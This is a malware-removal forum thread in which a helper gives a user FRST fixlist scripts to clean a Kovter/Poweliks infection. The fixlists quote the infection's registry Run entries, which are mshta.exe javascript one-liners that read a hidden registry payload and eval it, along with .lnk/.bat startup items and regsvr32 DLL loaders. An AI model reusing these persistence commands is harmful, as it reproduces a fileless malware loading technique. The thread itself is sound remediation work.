ando

Seem to be infected with Kovter or Kotver and/or Poweliks

Recommended Posts

Steve,

Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

CloseProcesses:
HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [**moxwisz<*>] => "C:\Windows\system32\mshta.exe" javascript:GN15ifR="sqVwu";DN1=new%20ActiveXObject("WScript.Shell");tQkrN2Uo="kSx4H0";R47yRN=DN1.RegRead("HKCU\\software\\hsyamdeihs\\oedg");Ey78YMP="KwNWPE2";eval(R47y (the data entry has 21 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [**fbln<*>] => "C:\Users\louisec\AppData\Local\7c8a1e\db2476.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [YQTPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\louisec\AppData\Local\Awdsworks\bwpsetlg.dll
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [Uhnmedia] => regsvr32.exe C:\Users\louisec\AppData\Local\Uhnmedia\bwpsetlg.dll <===== ATTENTION
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [**wjghlqtw<*>] => "C:\Windows\system32\mshta.exe" javascript:Fs7EBT6P="Dp0";g4x=new%20ActiveXObject("WScript.Shell");C4QSj="N7Y9s3";I8y2HH=g4x.RegRead("HKCU\\software\\xjlcaicix\\wrzzbxmcw");HiFFDK6k="knQkK6o";eval(I8y (the data entry has 20 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [**kqawmlub<*>] => "C:\Users\louisec\AppData\Local\bc2b\34b5.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5be9.lnk [2016-10-03]
Startup: C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6fafe.lnk [2016-10-03]
Startup: C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fbcd.lnk [2016-11-04]
URLSearchHook: [S-1-5-21-2629942752-1555253383-3497716934-1178] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159 -> {1062FA11-F6F7-46A1-BF36-93CBBD379024} URL = 
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
2016-06-17 17:54 - 2016-06-17 17:54 - 0004570 _____ () C:\Users\louisec\AppData\Roaming\1047x576black.png
2016-06-17 17:54 - 2016-06-17 17:54 - 0001779 _____ () C:\Users\louisec\AppData\Roaming\16ps.png
2016-06-17 17:54 - 2016-06-17 17:54 - 0002069 _____ () C:\Users\louisec\AppData\Roaming\40-nonlatin.conf
2016-06-17 17:54 - 2016-06-17 17:54 - 0001167 _____ () C:\Users\louisec\AppData\Roaming\403-14.htm
2016-06-17 17:54 - 2016-06-17 17:54 - 0001054 _____ () C:\Users\louisec\AppData\Roaming\alienfx.png
2016-06-17 17:54 - 2016-06-17 17:54 - 0000734 _____ () C:\Users\louisec\AppData\Roaming\Arabic- README-en
2016-06-17 17:54 - 2016-06-17 17:54 - 0001279 _____ () C:\Users\louisec\AppData\Roaming\aspnet.config
2016-06-17 17:53 - 2016-06-17 17:53 - 0002978 _____ () C:\Users\louisec\AppData\Roaming\basic.css
2016-06-17 17:53 - 2016-06-17 17:53 - 0000100 _____ () C:\Users\louisec\AppData\Roaming\blank.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0000524 _____ () C:\Users\louisec\AppData\Roaming\BMC blue 4.ADO
2016-06-17 17:53 - 2016-06-17 17:53 - 0000329 _____ () C:\Users\louisec\AppData\Roaming\Boa_Vista
2016-06-17 17:53 - 2016-06-17 17:53 - 0001088 _____ () C:\Users\louisec\AppData\Roaming\bookmarks.collapse.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0001289 _____ () C:\Users\louisec\AppData\Roaming\Brass - Raw.3PP
2016-06-17 17:53 - 2016-06-17 17:53 - 0000077 _____ () C:\Users\louisec\AppData\Roaming\Brunei
2016-06-17 17:53 - 2016-06-17 17:53 - 0004914 _____ () C:\Users\louisec\AppData\Roaming\b_it.jpg
2016-06-17 17:53 - 2016-06-17 17:53 - 0000101 _____ () C:\Users\louisec\AppData\Roaming\Casey
2016-06-17 17:53 - 2016-06-17 17:53 - 0001978 _____ () C:\Users\louisec\AppData\Roaming\caution.tif
2016-06-17 17:53 - 2016-06-17 17:53 - 0001256 _____ () C:\Users\louisec\AppData\Roaming\chunker.output.standalone.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0003878 _____ () C:\Users\louisec\AppData\Roaming\circleround_selectionsubpicture.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0000524 _____ () C:\Users\louisec\AppData\Roaming\Cool Gray 9 bl 4.ADO
2016-06-17 17:53 - 2016-06-17 17:53 - 0001464 _____ () C:\Users\louisec\AppData\Roaming\cp_keyboard.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0000027 _____ () C:\Users\louisec\AppData\Roaming\CST6
2016-06-17 17:53 - 2016-06-17 17:53 - 0001429 _____ () C:\Users\louisec\AppData\Roaming\delete_1.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0000065 _____ () C:\Users\louisec\AppData\Roaming\Douala
2016-06-17 17:53 - 2016-06-17 17:53 - 0002382 _____ () C:\Users\louisec\AppData\Roaming\eamonm.inf
2016-06-17 17:53 - 2016-06-17 17:53 - 0001018 _____ () C:\Users\louisec\AppData\Roaming\ebnf.table.bgcolor.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0000077 _____ () C:\Users\louisec\AppData\Roaming\El_Aaiun
2016-06-17 17:53 - 2016-06-17 17:53 - 0001541 _____ () C:\Users\louisec\AppData\Roaming\f12.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0001127 _____ () C:\Users\louisec\AppData\Roaming\f37.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0001106 _____ () C:\Users\louisec\AppData\Roaming\foil.title.size.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0001246 _____ () C:\Users\louisec\AppData\Roaming\fop.extensions.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0003255 _____ () C:\Users\louisec\AppData\Roaming\GBK-EUC-V
2016-06-17 17:53 - 2016-06-17 17:53 - 0001106 _____ () C:\Users\louisec\AppData\Roaming\GIF 64 No Dither.irs
2016-06-17 17:53 - 2016-06-17 17:53 - 0001204 _____ () C:\Users\louisec\AppData\Roaming\Glace_Bay
2016-06-17 17:52 - 2016-06-17 17:52 - 0001115 _____ () C:\Users\louisec\AppData\Roaming\graphic.default.extension.xml
2012-01-23 19:00 - 2012-01-23 19:00 - 0003599 _____ () C:\Users\louisec\AppData\Roaming\HogwashAlameda.MBF
1993-06-13 18:00 - 1993-06-13 18:00 - 0049794 _____ () C:\Users\louisec\AppData\Roaming\Kolinsky.P
2014-09-14 14:59 - 2014-09-14 15:05 - 0000824 _____ () C:\ProgramData\hpzinstall.log
C:\Users\Administrator\AppData\Local\Temp\ApplnchConfig.exe
C:\Users\louisec\AppData\Local\Temp\ApplnchConfig.exe
C:\Users\louisec\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp8d8nbd.dll
Shortcut: C:\Users\louisec\AppData\Local\bc2b\34b5.lnk -> C:\Users\louisec\AppData\Local\bc2b\6452.bat ()
Shortcut: C:\Users\louisec\AppData\Local\7c8a1e\db2476.lnk -> C:\Users\louisec\AppData\Local\7c8a1e\d6ff3d.bat ()
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:3251 [0]
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:3299 [0]
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:3400 [0]
AlternateDataStreams: C:\Users\louisec\Documents\$2000 x 5 people_files:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\ACOM:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Cafe:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Camp:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Conference Directory:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Correspondence:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Crisis Centre:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Directory:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\EIP:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Flyers:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Forms:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\FW two photos from Stepping Stones_files:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Groups:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Invoices:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Kids Quest:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Order of Service:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Payroll:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Petty Cash:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Policies & Procedures:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Publication:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Rolling Stones:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Rosters:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Scripture:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\signs:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Small Group Study:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Staff:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Standard Forms:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Stationery:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Stepping Stone:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Stones:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Website:Roxio EMC Stream [38]
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\Software\Classes\6d8069: "C:\Windows\system32\mshta.exe" "javascript:I3jSqGAl="HfVbg2";YT74=new ActiveXObject("WScript.Shell");Dn2EcvDt="owW2";Lb4F9e=YT74.RegRead("HKCU\\software\\hsyamdeihs\\oedg");OU7ut7="F7I";eval(Lb4F9e);COzjbgC5="X4gHYN1";" <===== ATTENTION
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\Software\Classes\94bf: "C:\Windows\system32\mshta.exe" "javascript:EI5X3ex="ngpBIFgf";ue7=new ActiveXObject("WScript.Shell");ql6bb="mZGc";Hq8N6n=ue7.RegRead("HKCU\\software\\xjlcaicix\\wrzzbxmcw");e0LSLB="4vf5yzIS";eval(Hq8N6n);eE7QhC8="0b7Tcz";" <===== ATTENTION
C:\Users\louisec\AppData\Local\7c8a1e
C:\Users\louisec\AppData\Local\Awdsworks
C:\Users\louisec\AppData\Local\Uhnmedia
C:\Users\louisec\AppData\Local\bc2b
C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5be9.lnk
C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6fafe.lnk
C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fbcd.lnk
Reboot:
Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Right-Click on FRST64, select "Run as adminstrator:

Press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.

Share this post


Link to post
Share on other sites

Hi,

 

Thanks for the help with this... much appreciated.

 

The fixlog.txt is attached.

 

Fixlog.txt

 

I'll be away for about 5 days (till late Friday night, 11 Nov) so won't be able to do any more on this machine until then.

 

Is there likely to be any further work to do? Or is the fixlog.txt you requested just fro confirmation that it worked?

 

Cheers,

Steve

Share this post


Link to post
Share on other sites

Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.

I will close this topic for the time being. Send me a PM when you get back and I will reopen this support topic.

Share this post


Link to post
Share on other sites

Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

C:\Users\louisec\AppData\Local\Temp\ApplnchConfig.exe
C:\Users\stevea.PATHWAYSCHURCH\AppData\Local\Temp\ApplnchConfig.exe
C:\Users\supersteve\AppData\Local\Temp\ApplnchConfig.exe
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
AlternateDataStreams: C:\Users\louisec\Documents\Invoices:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\supersteve\Documents\ERA_Installer_x64_en_US.exe:com.apple.quarantine [45]
Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.

Share this post


Link to post
Share on other sites

Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.

Share this post


Link to post
Share on other sites

Thread Closed

Reason: Lack of Response

PM either Kevin, Elise, or Arthur to have this thread reopened.

All posters requesting Malware Removal assistance are required to follow all procedures in the thread titled START HERE if you don't we are just going to send you back to this thread.

Share this post


Link to post
Share on other sites

Thread Closed

Reason: Lack of Response

PM either Kevin, Elise, or Arthur to have this thread reopened.

All posters requesting Malware Removal assistance are required to follow all procedures in the thread titled START HERE if you don't we are just going to send you back to this thread.
 

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.